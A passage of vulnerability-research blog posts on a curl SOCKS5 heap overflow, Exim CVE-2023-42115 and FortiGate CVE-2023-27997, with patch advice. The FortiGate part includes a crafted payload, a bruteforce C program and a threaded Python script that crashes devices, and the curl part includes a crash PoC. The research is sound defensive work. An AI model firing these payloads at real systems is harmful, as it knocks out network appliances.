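To make that one-byte length field concrete, here's a short Python sketch - not curl's code, just a model of the request layout shown in the snippet above (the port bytes are appended per the SOCKS specification; the helper name is ours):

```python
def build_socks5_connect(hostname: bytes, port: int = 80) -> bytes:
    # mirrors the C snippet above: version (5), connect (1), reserved (0),
    # then ATYP 3 for "domain name"
    req = bytearray([5, 1, 0, 3])
    # the address length is a single byte - a 300-byte hostname
    # silently truncates, just like the (char)hostname_len cast in C
    req.append(len(hostname) & 0xff)
    req += hostname
    req += port.to_bytes(2, "big")
    return bytes(req)

req = build_socks5_connect(b"A" * 300)
# req[4] is 44 (300 & 0xff): the declared length no longer matches
# the 300 hostname bytes actually placed in the buffer
```

This one-byte field is exactly why the 255-character limit exists in the protocol - and why a hostname that slips past the client-side length check is such bad news.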

What does the bug affect?

Of course, vulnerability (and thus exploitation) hinges on this destination buffer cnnct.socksreq being smaller than the size of a potential hostname. At first glance, the official documentation appears to state that, in the default configuration, this is not the case:

An overflow is only possible in applications that do not set CURLOPT_BUFFERSIZE or set 
it smaller than 65541. Since the curl tool sets CURLOPT_BUFFERSIZE to 100kB by default 
it is not vulnerable unless rate limiting was set by the user to a rate smaller than 
65541 bytes/second.

But we mustn't jump to conclusions without reading the full document. There's a (bolded!) caveat at the bottom of the page.

**The analysis in this section is specific to curl version 8.** Some older versions of curl 
version 7 have less restriction on hostname length and/or a smaller SOCKS negotiation 
buffer size that cannot be overridden by [CURLOPT_BUFFERSIZE](https://curl.se/libcurl/c/CURLOPT_BUFFERSIZE.html).

It is, indeed, easy to cause version 7.74.0 of the cURL runtime to segfault with a public PoC:

# gdb --args curl  -vvv -x socks5h://172.17.0.1:9050 $(python3 -c "print(('A'*10000), end='')")
[truncated]
(gdb) run
Starting program: /usr/local/bin/curl -vvv -x socks5h://172.17.0.1:9050 AAAAAAAAA[truncated]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
*   Trying 172.17.0.1:9050...
* SOCKS5: server resolving disabled for hostnames of length > 255 [actual len=10000]
* SOCKS5 connect to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[truncated]
Program received signal SIGSEGV, Segmentation fault.
0x00007f529d9f0aec in Curl_resolver_kill () from /usr/local/lib/libcurl.so.4
(gdb) x/1i $pc
=> 0x7f529d9f0aec <Curl_resolver_kill+28>:      cmp    QWORD PTR [rdi],0x0
(gdb) info registers rdi
rdi            0x4141414141414141  4702111234474983745
(gdb)

Yikes! Clearly the out-of-the-box cURL is vulnerable to something, at least! Although this simple PoC isn't actually overflowing the SOCKS context buffer itself, we've broken the error handling and caused enough corruption to read an arbitrary memory location - clearly something's not right. Given this instability, combined with the lack of public analysis on version 7, we'd advise anyone still running version 7 to upgrade to version 8 at their earliest convenience.

Summary

So here we have it - a heap overflow in cURL, and in libcURL, the embedded version. Fortunately (for defenders) it requires use of a SOCKS proxy, and it only affects a well-defined range of cURL versions.

So it's not world-ending, but it's fairly bad, particularly for users of a 7.x version of cURL. The real problem with bugs such as these is the number of disparate codebases and embedded devices that contain libcURL, and will now need patching.

A frank and informative analysis by the author of the vulnerable code notes that the bug has been in the cURL codebase for 1315 days - enough to filter through into appliances and other "oops, I forgot about that one" devices. I suspect we'll be patching this one for quite some time.

FAQ

In what is becoming a regular feature of watchTowr blog posts, here's a quick question-and-answer section to quell any (hopefully misplaced) panic:

Q) Which versions are affected?

A) Affected versions are libcURL 7.69.0 up to (and including) 8.3.0. Versions below 7.69.0 are not affected.

Q) Is watchTowr aware of any trivially-exploitable enterprise-grade software where this vulnerability could be abused?

A) At this point in time, no.

Q) Are the conditions necessary for an external party to exploit this vulnerability common?

A) No.

Q) Does this bug require a malicious SOCKS proxy?

A) No, it does not - it just needs a connection to a malicious host over a SOCKS proxy.

Q) I use the command-line version of cURL all the time! It's version 8, but below the fixed 8.4.0. Do I need to upgrade?

A) Well, you should always upgrade, because it's a Best Practice (TM). But the bug likely isn't exploitable on your system, so rest easy.

Q) I use the command-line version of cURL all the time, and it's only version 7 - but I never use a SOCKS proxy. Should I be worried?

A) The bug doesn't affect you, since you don't use a SOCKS proxy. Having said that, I'd advise caution - it may be difficult to ensure that malicious users can't force you to use a SOCKS proxy (for example, as an elevation or lateral-movement path). Upgrading, if at all possible, is always the safest option.

Q) I use the command-line version of cURL all the time, and it's only version 7 - and I use a SOCKS proxy. How about me?

A) Ooof, that's a bad scenario. While the cURL documentation isn't clear on the exploitability of the v7 command-line tool, we've shown that at least some versions will segfault, although it isn't clear if this is due to a heap overflow condition. In the absence of a clear answer on exploitability, we would advise you to upgrade to version 8 as a matter of urgency.

Q) I can't upgrade! How can I mitigate this vulnerability?

A) You can mitigate by avoiding the use of a SOCKS proxy, if at all possible. If you run cURL in a privileged context, be aware that various options may enable a SOCKS proxy - from the command line, the URL, or environment variables - and you may need to sanitize these to prevent a malicious user from connecting to a malicious SOCKS proxy.

Q) Is this vulnerability going to turn every SSRF into RCE?

A) Sadly not.

90s Vulns In 90s Software (Exim) - Is the Sky Falling?

2 October 2023 at 12:02

A few days ago, ZDI went public with no less than six 0days in the popular mail server Exim. Ranging from 'potentially world-ending' through to 'a bit of a damp squib', these bugs were apparently discovered way back in June 2022 (!) - but naturally got caught up in the void between the ZDI and Exim for quite some time. Mysterious void.

As a brief background on Exim, "Exim is a message transfer agent (MTA) originally developed at the University of Cambridge for use on Unix systems connected to the Internet". Exim is in use on millions of systems worldwide, and has a history of 'interesting vulnerabilities'.

Given this, there has been a lot of panic about the issues (which we attempted to quell somewhat with our tweet thread), but they boil down to a few admittedly dangerous bugs that require a very specific environment to be accessible.

For example, CVE-2023-42117 is only going to affect you if you use Exim's 'proxy' functionality with an untrusted proxy, which seems like an unlikely scenario. Here's a quick rundown of the bugs and the functionality they depend on:

CVE            | CVSS | Requirements
CVE-2023-42115 | 9.8  | "External" authentication scheme configured and available
CVE-2023-42116 | 8.1  | "SPA" module (used for NTLM auth) configured and available
CVE-2023-42117 | 8.1  | Exim Proxy (different to a SOCKS or HTTP proxy) in use with an untrusted proxy server
CVE-2023-42118 | 7.5  | "SPF" condition used in an ACL
CVE-2023-42114 | 3.7  | "SPA" module (used for NTLM auth) configured to authenticate the Exim server to an upstream server
CVE-2023-42119 | 3.1  | An untrusted DNS resolver

You can see that the bugs have quite a lot of requirements. Most of us don't need to worry. If you're one of the unlucky ones who uses one of the listed features, though, you'll be keen to get more information before undertaking ZDI's advice to "restrict interaction with the application".

Fear not, watchTowr is here with some analysis! Let's take a close look at that big scary CVSS 9.8 in the "External" authentication scheme, and see if it really is as scary as it sounds.

CVE-2023-42115

So, what is 'external' authentication all about, anyway?

Well, it enables authentication based on some properties which are 'external' to the SMTP session - usually an x509 certificate.

It is configured in the usual way in the Exim configuration file with a line such as driver = external, along with a handful of properties that directs the server to extract and test the correct information from the client. The Exim documentation gives an example similar to the following:

ext_ccert_san_mail:
  driver =            external
  public_name =       EXTERNAL

  server_param2 =     ${certextract {subj_altname,mail,>:} {$tls_in_peercert}}
  server_condition =  ${if forany {$auth2} {eq {$item}{$auth1}}}
  server_set_id =     $auth1

Slightly obtuse, but this is a mostly-readable method of verifying that the cert provided by the client has the correct 'Subject Alternative Name' for mail authentication, and then it proceeds to check that the username presented by the client (stored in the $auth1 variable) matches the certificate. This $auth1 is presented by the client in the form of a base64-encoded blob after the AUTH command.

This $auth1 variable is just one parameter that the external matcher takes, however. Other parameters can be provided, delimited by a binary NULL byte. These are put into variables $auth2 through $auth4. These are stored in the auth_vars global var.

uschar *auth_vars[AUTH_VARS];    // AUTH_VARS is 4 at this point

The code which parses these variables will carefully check that it does not write to this global beyond its 4-element limit, as we can see in a clarified version of get_data.c:

#define EXPAND_MAXN 20

int
auth_read_input(const uschar * data)
{
   if ((len = b64decode(data, &clear)) < 0)
     return BAD64;

   for (end = clear + len; clear < end && expand_nmax < EXPAND_MAXN; )
   {
      if (expand_nmax < AUTH_VARS)
         auth_vars[expand_nmax] = clear;
       expand_nstring[++expand_nmax] = clear;
       while (*clear != 0) 
          clear++;
       expand_nlength[expand_nmax] = clear++ - expand_nstring[expand_nmax];
   }
}

What happens if we supply more than four variables? Well, there's no problem - there's the crucial if (expand_nmax < AUTH_VARS) before writing to auth_vars. An OOB write isn't possible here.

However, the 'external' authenticator in particular misuses this functionality. It calls the code snippet above, which counts the variables, correctly ignoring any that are beyond AUTH_VARS. Let's see what the external authenticator does once auth_read_input has returned:

if (*data)
  if ((rc = auth_read_input(data)) != OK)
    return rc;

...

if (ob->server_param2)
{
  uschar * s = expand_string(ob->server_param2);
  auth_vars[expand_nmax] = s;       // 👀!!
  expand_nstring[++expand_nmax] = s;
  expand_nlength[expand_nmax] = Ustrlen(s);
  if (ob->server_param3)
  {
    s = expand_string(ob->server_param3);
    auth_vars[expand_nmax] = s;
    expand_nstring[++expand_nmax] = s;
    expand_nlength[expand_nmax] = Ustrlen(s);
  }
}

What's that I spy? Is that an unguarded access to auth_vars, indexed by the expand_nmax that holds the number of variables observed, and may be anywhere up to EXPAND_MAXN (20)?!


I think so!

This enables an attacker to write two pointers, pointing to the data at ob->server_param2 and ob->server_param3, beyond the index of the auth_vars buffer.

Here's an example SMTP session to show the overflow in action. Unfortunately, no segfault is produced, and the corruption is silent. We verified the overflow by adding extra logging to Exim.

EHLO watchtowr
> 250-host Hello root at watchtowr
AUTH external YWFhYQBhYWFhAGFhYWEAYWFhYQBhYWFhAGFhYWEAYWFhYQo=

Here, we've connected to the server, said hello (well, EHLO, which is an extended version of the usual HELO), and elected to perform external authentication via the AUTH external command, supplying a base64-encoded blob, as one would expect. The base64-encoded blob in question, however, contains seven fields, delimited by NULL bytes.

$ echo YWFhYQBhYWFhAGFhYWEAYWFhYQBhYWFhAGFhYWEAYWFhYQo= | base64 -d | hexdump.exe -C
00000000  61 61 61 61 00 61 61 61  61 00 61 61 61 61 00 61  |aaaa.aaaa.aaaa.a|
00000010  61 61 61 00 61 61 61 61  00 61 61 61 61 00 61 61  |aaa.aaaa.aaaa.aa|
00000020  61 61 0a                                          |aa.|

All seven variables are parsed by auth_read_input, which stores only the first four in auth_vars but duly sets expand_nmax to 7, since seven variables are present. The 'external' authenticator then attempts to append the ob->server_param2 variable - resulting in the promised OOB write to auth_vars[7].
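The blob construction and the counting behaviour can be reproduced in a few lines of Python - a model of the parser's logic, not Exim's actual code:

```python
import base64

AUTH_VARS = 4      # size of the auth_vars array
EXPAND_MAXN = 20   # the parser's hard ceiling on counted fields

# the same seven-field, NUL-delimited blob used in the session above
blob = b"\x00".join([b"aaaa"] * 7) + b"\n"
print(base64.b64encode(blob).decode())
# -> YWFhYQBhYWFhAGFhYWEAYWFhYQBhYWFhAGFhYWEAYWFhYQo=

# model of auth_read_input: every field bumps expand_nmax (capped at
# EXPAND_MAXN), but only the first AUTH_VARS fields are stored
fields = blob.split(b"\x00")
expand_nmax = min(len(fields), EXPAND_MAXN)
stored = fields[:AUTH_VARS]
# expand_nmax is now 7, so auth_vars[expand_nmax] lands 3 slots past the array
```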

Consequences

So, scary stuff! CVSS 9.8!

Not quite. Even if you do rely on this functionality, it is difficult to imagine how an attacker could craft a functional exploit given the constraints on the written data. Of course, it's always possible - never say never! - but it seems unlikely to us.

So, our advice is the usual - patch when you can, once patches are available (Exim have stated they will release patches at 12:00 UTC today, Monday 2nd October). But in the meantime, don't panic - this one is more of a damp squib than a world-ending catastrophe.


Brief FAQ

I bet you have loads of questions, so let's have a simple FAQ to answer the burning questions you might have.

  • I don't use external auth, or SPA auth. I don't have a malicious DNS server and I don't use the spf condition in my ACLs. Finally, I don't use that weird Exim Proxy thing. Do I have anything to worry about?

Not at all. Patch at your leisure if you like, but you've likely got zero exposure.

  • I don't know if I use external or SPA auth! How can I find out?!

Look in your Exim config (if you don't know where it is, run exim4 -bP configure_file to find out). If you find the following lines, you are likely using one of the affected authentication mechanisms:

driver = external

Or for SPA:

driver = spa

  • Why are we only seeing disclosure now, given that the initial report was in June 2022?

🤷

Please exercise caution and apply patches to systems you identify internally as running an affected version of Exim - but, luckily(?) this is not the end-of-the-world moment it was purported to be.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

Xortigate, or CVE-2023-27997 - The Rumoured RCE That Was

13 June 2023 at 02:10

When Lexfo Security teased a critical pre-authentication RCE bug in FortiGate devices on Saturday 10th, many people speculated on the practical impact of the bug. Would this be a true, sky-is-falling level vulnerability like the recent CVE-2022-42475? Or was it some edge-case hole, requiring some unusual and exotic prerequisite before any exposure? Others went further still, questioning the legitimacy of the bug itself. Details were scarce and guesswork was rife.

Here we go again..

Many administrators of Fortinet devices were, once again, in a quandary. Since Fortinet don't release discrete security patches, but require that users update to the current build of their firmware in order to remediate issues, updates to their devices are never risk-free. No administrator would risk updating the firmware on such an appliance unless a considerable risk was present. Does this bug represent that risk? We just don't (didn't!) know.

Here at watchTowr, we don't like speculation or this kind of vague risk statement - neither do our clients, who expect us to be able to rapidly tell them if they're affected. Thus, we set out to clear the waters.

Patch Diffing

Since fixes for the vulnerable devices were quietly published by Fortinet, we decided to dive in and 'patch diff' the bug, comparing the vulnerable and patched versions at the assembly level to locate details of the fix. This gives us the ability to understand what has changed across the versions, and thus home in on potentially affected functions.

Unfortunately, this is particularly difficult in a device such as a Fortigate appliance, where all application logic is compiled into a large 66-megabyte init binary. Indeed, the 'resolved issues' section for the patched 7.0.12 lists over 70 issues (including the enticing-sounding 'Kernel panic occurs when receiving ICMP redirect messages'). Time to wade through the changes!

Our toolset here was the venerable IDA Pro coupled with the Diaphora plugin, designed to aid in exactly this task. To give you an idea of scale, Diaphora 'matched' around 100,000 functions between the patched and the vulnerable codebase, with a further 100,000 it could not correlate.

However, one piece of information we do have is that the bug affects only SSL VPN functionality, and so we zoomed in on changes related to just that. After disregarding a number of false positives, we came across a very interesting-looking diff -

'movzx', you say? Hmmm

Disregarding the noise, we can see that a number of movzx instructions have been added to the code (the vulnerable version is on the left, the fixed on the right). This is interesting as the movzx instruction - or "MOVe with Zero eXtend" - typically indicates that a variable with a smaller datatype is being converted into a variable of a larger datatype. For example, in C, this would usually be expressed as a cast:

unsigned char narrow = 0x11;
unsigned long wide = (unsigned long)narrow;

We've seen instances, time and time again, of bugs seeping into C-language code as developers mismatch variable datatype lengths. Perhaps this is our smoking gun?

Looking further, this function is called by the function rmt_logincheck_cb_handler, which is the callback handler for the endpoint /remote/logincheck, exposed to the world as part of the VPN code, without authentication. This looks like what we're interested in!

Taking a look at the code surrounding our diff is enlightening. Here's some cleaned-up C pseudocode that expresses the relevant part of the vulnerable version (7.0.11, for those of you following along at home). Note that this function receives the value of the enc URL parameter (along with its length).

__int64  sub_15DC6A0(__int64 logger, __int64 a2,  char *encData)
{
	lenOfData = strlen(encData);
	if (lenOfData <= 11 || (lenOfData & 1) != 0)
	{
		error_printf(logger, 8, "enc data length invalid (%d)\n", lenOfData);
		return 0xFFFFFFFFLL;
	}

	MD5Data(g_rmt_loginConn_salt, encData, 8, expandedSalt);
	char* decodedData = (char*)alignedAlloc(lenOfData / 2);
	if (!decodedData)
		return 0xFFFFFFFFLL;

	for(int n = 0; lenOfData > 2 * n; n++)
	{
		char msb = decodeEncodedByte(encData[n * 2    ]);
		char lsb = decodeEncodedByte(encData[n * 2 + 1]);
		decodedData[n] = lsb + (0x10 * msb);
	} 

	char encodingMethod = decodedData[0];
	if (encodingMethod != 0)
		printf("invalid encoding method %d\n", encodingMethod);

	short v14 = ((short*)decodedData)[1];
	unsigned char payloadLength = (v14 ^ expandedSalt[0]);
	v15 = (char)( expandedSalt[1] ^ LOBYTE(v14) );
	if (payloadLength > lenOfData - 5 )
	{
		error_printf(logger, 8, "invalid enc data length: %d\n", payloadLength);
		return 1LL;
	}
...

While this may seem intimidating, it's actually pretty simple, although there are a few things we need to note.

First, the code checks that the enc data is longer than 11 bytes, and of an even length, before it proceeds to expand a salt via the MD5Data function. Note that this salt is the result of MD5'ing the g_rmt_loginConn_salt concatenated with the first 8 bytes of the input string.

After this, it allocates a buffer for half the size of the encoded data, and then iterates over all the encoded data, converting each set of two bytes into one byte (via two calls to decodeEncodedByte - they just convert ASCII hex digits to binary). After this, it extracts an encodingMethod from the first byte of the decoded data, and warns if it is not zero (although, interestingly, it doesn't appear to return if this error condition is met).

After this is where things get interesting, as a payload length is extracted from the decoded data.

v14, here, is just a temporary value which holds a 16-bit length obtained from the decoded data. The payload length is obtained by XOR'ing this 16-bit value with the first byte of the expanded salt. This is where the bug manifests - can you spot it?

If we put this code into a real C IDE, such as Visual Studio, we'll get a helpful warning from the compiler:

The compiler is warning us of something!

This warning, though verbose, is just cautioning us that the xor operator is taking in a 16-bit short and an 8-bit char, and that the result is then truncated down to an 8-bit char by the assignment, silently discarding the upper bits. Since this is somewhat counterintuitive, the compiler emits a warning.

If we look at the disassembled code itself, we can see this is where the movzx instructions we saw before come into play. Let's take a look again:

movzx   eax, word ptr [rdx+4]	; short v14 = ((short*)decodedData)[1]
xor     esi, eax				; short result = v14 XOR expandedSalt[0]
movzx   eax, ah					; char v15 = result

And what does the patched version look like? Something like this:

movzx   ecx, byte ptr [rbp+var_50]	; short salt = (char)expandedSalt[0]
movzx   eax, word ptr [rdx+4]		; short v14 = ((short*)decodedData)[1]
xor     ecx, eax					; result = salt XOR v14
movzx   eax, ah						; eax = (char)result
xor     al, byte ptr [rbp+var_50+1] ; HIBYTE(eax) = HIBYTE(result)

In C, the difference is more subtle. The vulnerable version, as we saw above:

unsigned char payloadLength = (v14 ^ expandedSalt[0]);

While the fixed:

short payloadLength = ((short) v14 ^ expandedSalt[0]);

We can see, now, that the payload length variable has increased from 8 bits to 16.

The final thing that this code snippet does is to perform a length check, ensuring that the payloadLength as obtained from the decoded data does not exceed the length of the allocated output buffer. However, because the payloadLength has been truncated to 8 bits, this check is ineffective.

Take, for example, a buffer of 0x200 bytes, which encodes within it a payloadLength of 0x1000 bytes. Only the bottom 8 bits of the payloadLength is observed, and the comparison 0x00 <= 0x200 is used, which obviously passes.
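In Python terms, a quick model of that broken check (the values here are the hypothetical ones from the example above, not taken from a real device):

```python
payload_length = 0x1000   # 16-bit length encoded by the attacker
buffer_len = 0x200        # size of the allocated output buffer

# the assignment to an unsigned char keeps only the low 8 bits
truncated = payload_length & 0xff
assert truncated == 0x00

# the vulnerable length check: only errors out if truncated > buffer_len - 5
check_fails = truncated > buffer_len - 5
assert not check_fails    # the check passes, despite 0x1000 > 0x200
```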

Reading the rest of the function reveals that this payloadLength is used to control the amount of data we process:

if (v14 != 0)
{
	__int64 lastIndex = payloadLength - 1;
	int inputIndex = 2;
	char* outputData = &decodedData[5];
	for(int outputIndex = 0; ; outputIndex++)
	{
		outputData[outputIndex] ^= expandedSalt[inputIndex];
		if (lastIndex == outputIndex)
			break;

		inputIndex = (outputIndex + 3) % 0x10;
		if (inputIndex == 0)
		{
			MD5_CTX md5Data;
			MD5_Init(&md5Data);
			MD5_Update(&md5Data, expandedSalt, 16LL);
			MD5_Final(expandedSalt, &md5Data);
		}
	}
}

Here we are iterating over our output buffer, XOR'ing in data from the expanded salt. Every 0x10 bytes, we MD5 the salt, and use the result as the salt for the next 0x10 bytes. It seems clear that a payloadLength of over 0xFF will cause an out-of-bounds write.
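Modelled in Python (using hashlib's MD5 in place of the appliance's internal routines - a sketch of the loop's logic, not Fortinet's code), the keystream looks something like this:

```python
import hashlib

def apply_keystream(data: bytes, salt: bytes) -> bytes:
    """XOR data with the rolling-MD5 keystream described above."""
    salt = bytearray(salt)
    out = bytearray(data)
    idx = 2  # inputIndex starts at 2 in the C code
    for i in range(len(out)):
        out[i] ^= salt[idx]
        idx = (i + 3) % 0x10
        if idx == 0:
            # every 0x10 bytes, the salt is re-MD5'd for the next block
            salt = bytearray(hashlib.md5(salt).digest())
    return bytes(out)

# since the keystream depends only on the salt and the position, applying
# it twice is a no-op
salt = hashlib.md5(b"example-salt").digest()
data = b"watchTowr" * 5
assert apply_keystream(apply_keystream(data, salt), salt) == data
```

That involution is handy from the attacker's side: to make the server decode chosen bytes, you simply apply the same keystream to them before sending.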

Exploitation

Now that we understand the bug, it's time to exploit it! We won't be publishing a full RCE exploit - we don't see the need to publish this at this stage - but instead will describe crafting an exploit which will corrupt the heap and cause the Fortigate device to crash and reboot.

Let's recap on that enc parameter. What do we need to satisfy? Referring to our code snippet above, we must satisfy the following:

  • The value must be over 11 bytes in length, and of an even length
  • The value must contain a hex-encoded ASCII payload, which must be xor'ed with MD5(salt + payload[0:8])
  • The decoded payload must have bytes 2 and 3 - our payloadLength - set to something greater than 0x00FF

If these conditions are met, then an out-of-bounds write will occur.

The obvious hurdle here is encoding the payload, which requires that we know the g_rmt_loginConn_salt value. Fortunately, if we query the /remote/info endpoint, the server will simply tell us this value, since it is not cryptographically sensitive:

<?xml version='1.0' encoding='utf-8'?>
<info>
<api encmethod='0' salt='401cbdce' remoteauthtimeout='30' sso_port='8020' f='4df' />
</info>

Since MD5 is fairly fast, it's possible to simply bruteforce which values of payload[0:8] will decode to something containing a payloadLength of a given value. Let's look for one with the value 0xbeef, and write a little C code:

int main()
{
	char encData[8];
	memset(encData, '0', sizeof(encData));

	for(unsigned long valToInc = 0; valToInc != 0xffff; valToInc++)
	{
		char valAsHex[10];
		sprintf_s(valAsHex, 10, "%04lx", valToInc);
		memcpy(&encData[4], valAsHex, 4);

		unsigned char hash[0x10];
		MD5Data(g_rmt_loginConn_salt, encData, 8, (unsigned char*)&hash);
		unsigned char decodedSizeLow = hash[2] ^ encData[2];
		unsigned char decodedSizeHigh = hash[3] ^ encData[3];
		unsigned short decodedSize = ((unsigned short)decodedSizeLow) | (((unsigned short)decodedSizeHigh) << 8);
		if (decodedSize == 0xbeef)
		{
			printf("Found value with decodedSize 0x%04x: %.8s\n", decodedSize, encData);
			break;
		}
	}

	return 0;
}

We're soon rewarded:

Found value with decodedSize 0xbeef: 000000247255fc38

The 'size' field here is 0x0024, which when XOR'ed with the result of MD5("401cbdce" + "000000247255fc38"), yields a hash of 5c f9 df 8e 0b 03 40 e7 05 84 f0 cc 11 a7 8c a5 - which when XOR'ed with our original input gives a result starting 6c c9 ef be - you can see our new size, 0xbeef, in little-endian format.
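We can sanity-check that last XOR step in a couple of lines of Python, using the hash bytes quoted above:

```python
# first 4 bytes of the expanded MD5 salt, as quoted above
hash_prefix = bytes.fromhex("5cf9df8e")
# first 4 ASCII characters of our enc value
ascii_input = b"0000"

decoded = bytes(h ^ c for h, c in zip(hash_prefix, ascii_input))
assert decoded == bytes.fromhex("6cc9efbe")   # ..ef be = 0xbeef, little-endian
```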

Finally, we'll make our input greater than 0xbe bytes so that the truncated length check will pass. Our final enc value:

000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

We apply this by POST'ing it to /remote/logincheck, along with some other (bogus) parameters:

POST /remote/logincheck HTTP/1.1
Host: <IP>:<port>
Content-Length: <correct value>
Connection: close

ajax=1&username=test&realm=&credential=&enc=000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... 

And we can see the result in the system logs:


Note that the stack trace here is a red herring - since there is heap corruption, the system is crashing at a point unrelated to the actual attack point. It is also worth pointing out that, since the heap is non-deterministic, running the attack multiple times with differing sizes may be necessary before heap corruption manifests as a crash.

I used the following (very messy!) Python code, which took from a few seconds to a few minutes to cause a crash:

import threading

import requests

def threadMain(idx):
	for n in range(1000 + idx, 32670000, 10):
		try:
			payload = "ajax=1&username=asdf&realm=&enc=000000247255fc38" + ('a' * (n * 2))
			requests.post(
				"https://<IP>:<port>/remote/logincheck",
				data=payload,
				verify=False,
			)
		except Exception:
			pass

threads = []
for n in range(0, 10):
	t = threading.Thread(target=threadMain, args=(n,))
	t.start()
	threads.append(t)

for t in threads:
	t.join()

Impact

While researching the bug itself is a fun way to spend a rainy Sunday afternoon, it's important to remember our original motivation, which is to ensure that concerned administrators are able to make a reasoned, risk-based decision with regard to remediation. A crucial variable in this decision is the likelihood of exploitation.

It's important to note that this class of bug, the heap overflow, is usually not easy to exploit (with some exceptions). Compared to other classes, such as command injection, exploitation for full RCE is likely to be out of reach for many attackers unless an exploit is authored by a skilled researcher and subsequently becomes public.

Exploitation is further complicated by the use of the MD5 hash on the output data, but is by no means impossible. Indeed, this bug may attract the kind of exploit developers keen to showcase their skills.

Based on this, it seems unlikely (but at the same time, also plausible) that we'll see widespread exploitation for RCE. However, this is not the only threat from this bug - it is important to note that it is very easy even for an unskilled attacker to craft an exploit which will crash the target device and force it to reboot. In contrast to full RCE, it seems likely that this will be exploited by unskilled attackers for their amusement.

Rapid Response

We hope this blog post is useful to those who are in the unfortunate position of making a patching decision, and helps to offset Fortinet's usual tight-lipped approach to vulnerability disclosure.

For reference, it took a watchTowr researcher around seven hours to reproduce the issue (including around two hours to run Diaphora!). It seems likely that sophisticated adversaries did the same thing, hoping for a window of exploitation before the vulnerability details became public on the 13th.

This vulnerability was reproduced by watchTowr researchers on the 11th of June 2023, well ahead of the scheduled embargo lifting on the 13th.

Soon after understanding the issue, watchTowr automated detection and proactively ran hunts across client estates, ensuring that administrators were aware of any vulnerable installations and had adequate time to remediate issues before the public release of the bug on the 13th.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about how the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, can support your organisation, please get in touch.

Fortinet and The Accidental Bug

9 June 2023 at 06:52

As part of our Continuous Automated Red Teaming and Attack Surface Management capabilities delivered through the watchTowr Platform, we see a lot of different bugs in a lot of different applications through a lot of different device types. We're in a good position to remark on these bugs and draw conclusions about different software vendors.

Our job is to find vulnerabilities, and we take a lot of pride in doing so - it's complex and intricate work. But, it is deeply concerning when this work is trivial in targets that are supposed to be a bastion of security. One common theme that we've seen a lot is that appliances, designed to be deployed at security boundaries, are often littered with trivial security issues.

Today we'd like to share one such example: a scarily-easy-to-exploit vulnerability in the SSLVPN component of Fortinet's Fortigate devices, which we discovered during our research into a totally unrelated bug, and which, at the time of writing, still hasn't been fixed despite an extension to the usual 90-day disclosure period.

Before We Begin

So. Let's talk about bugs in general. Bugs are, let's face it, a fact of life. Every vendor has them, and sometimes, they turn into fully-fledged vulnerabilities. There is a common knee-jerk reaction to avoid software by vendors that've had recent hyped bugs, but this is usually short-sighted folly. All vendors have bugs. All vendors have vulnerabilities.

.. However..

Some bugs are more understandable than others, and indeed, some bugs make us question the security posture of the responsible parties.

I'm sure you remember a previous post in which I go into detail about CVE-2022-42475, a vulnerability in a Fortinet appliance which was a pretty serious oh-no-the-sky-is-falling bug for a lot of enterprises. But let's remember our mantra - fair enough, bugs happen, let's not pile on to Fortinet for it.

The Bug

Fortinet and The Accidental Bug
With apologies to Webcomic Name

While researching CVE-2022-42475 as part of our rapid reaction capability for clients, we started to notice some unusual errors in our test equipment's logging. The sslvpn process was seemingly dying of a segfault. Initially, we imagined we were triggering the bug we were targeting for analysis via a different code path.

Unfortunately, this was not the case - it turned out to be a completely new bug, found entirely by accident. This was determined by taking a look at the debug log (via diagnose debug crashlog read) which helpfully yields a stack trace:

15: 2022-12-13 05:35:29 <01230> application sslvpnd
16: 2022-12-13 05:35:29 <01230> *** signal 11 (Segmentation fault) received ***
17: 2022-12-13 05:35:29 <01230> Register dump:
18: 2022-12-13 05:35:29 <01230> RAX: 0000000000000000   RBX: 0000000000000003
19: 2022-12-13 05:35:29 <01230> RCX: 00007fff7f4761d0   RDX: 00007fa8b2961818
